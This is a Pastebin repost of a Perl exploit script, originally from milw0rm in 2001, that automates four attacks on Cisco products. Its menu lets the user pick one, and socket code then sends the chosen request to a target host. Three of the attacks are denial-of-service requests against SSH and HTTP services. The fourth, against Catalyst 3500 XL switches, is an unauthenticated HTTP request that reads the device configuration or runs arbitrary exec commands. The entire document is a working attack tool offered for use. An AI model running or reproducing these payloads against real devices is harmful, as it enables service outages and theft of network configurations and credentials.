Advertisement
FlyFar

Cisco (Multiple Products) - A tool which automates several attacks against Cisco products

Feb 24th, 2024
1,352
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.35 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2. #
  3. # Written by hypoclear - http://hypoclear.cjb.net
  4. # Thong-th-thong-th-thong.pl AKA thong.pl is a PERL script
  5. # which automates several attacks against various Cisco products.  
  6. # To be specific:
  7. #
  8. # 12-13-00 - Cisco Catalyst ssh Protocol Mismatch DoS Vulnerability
  9. # 11-28-00 - Cisco 675 Web Administration Denial of Service Vulnerability
  10. # 10-26-00 - Cisco Catalyst 3500 XL Remote Arbitrary Command
  11. # 10-25-00 - Cisco IOS Software HTTP Request DoS Vulnerability
  12. #
  13. #   usage: ./thong.pl -h <host>
  14.  
  15. use IO::Socket; use Getopt::Std;
  16. getopts('h:');
  17.  
  18. if (defined $opt_h)
  19.  {
  20.   $HOST = $opt_h;
  21.   $PORT;
  22.   $STRING = "";
  23.   $menu_opt = "";
  24.  
  25.   menu();
  26.   computeOption();
  27.   exploit();
  28.  }
  29.  
  30. else {print "\n\n usage ./thong.pl -h <host>\n\n"}
  31.  
  32. sub menu
  33. {
  34.   print "\n\n     DATE     VULNERABILITY
  35.  1. 12-13-00 - Cisco Catalyst ssh Protocol Mismatch DoS Vulnerability
  36.  2. 11-28-00 - Cisco 675 Web Administration Denial of Service Vulnerability
  37.  3. 10-26-00 - Cisco Catalyst 3500 XL Remote Arbitrary Command
  38.  4. 10-25-00 - Cisco IOS Software HTTP Request DoS Vulnerability  
  39.  
  40.  Enter Option: ";
  41.   $menu_opt = <STDIN>;
  42.   chomp ($menu_opt);
  43. }
  44.  
  45. sub computeOption
  46. {
  47.   if    ($menu_opt == "1"){$PORT = 22; $STRING = "this ain't SSH";}
  48.   elsif ($menu_opt == "2"){$PORT = 80; $STRING = "GET ? HTTP/1.0\n\n";}
  49.   elsif ($menu_opt == "3"){$PORT = 80; three();}
  50.   elsif ($menu_opt == "4"){$PORT = 80; $STRING = "GET /error?/ HTTP/1.0\n\n";}
  51.   else  {print "Select a real option!\n"; menu();}
  52. }
  53.  
  54. sub three
  55. {
  56.   print "Enter file to read or enter D for default (/show/config/cr): ";
  57.   $key = <STDIN>;
  58.   chomp ($key);
  59.   print "\nGetting $key...";
  60.  
  61.   if (($key eq "D")||($key eq "d"))
  62.   {
  63.     print "\nGetting /show/config/cr...\n";
  64.     $STRING = "GET /exec/show/config/cr HTTP/1.0\n\n";
  65.   }
  66.   else
  67.   {
  68.     print "\nGetting $key...\n";
  69.     $STRING = "GET /exec$key HTTP/1.0\n\n";
  70.   }
  71. }
  72.  
  73. sub exploit
  74. {
  75.   print "\n\ntrying to exploit $HOST...\n";
  76.  
  77.   $SOCKET = IO::Socket::INET->new(PeerAddr => $HOST,
  78.                                   PeerPort => $PORT,
  79.                                   Proto    => "tcp")
  80.          || die "Couldn't connect to $HOST\n";
  81.  
  82.   print "\n$STRING\n";
  83.   print $SOCKET "$STRING";
  84.  
  85.   if ($menu_opt == 3){while (<$SOCKET>){print}}
  86.   close($SOCKET);
  87. }
  88.  
  89.  
  90. # milw0rm.com [2001-01-27]
  91.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement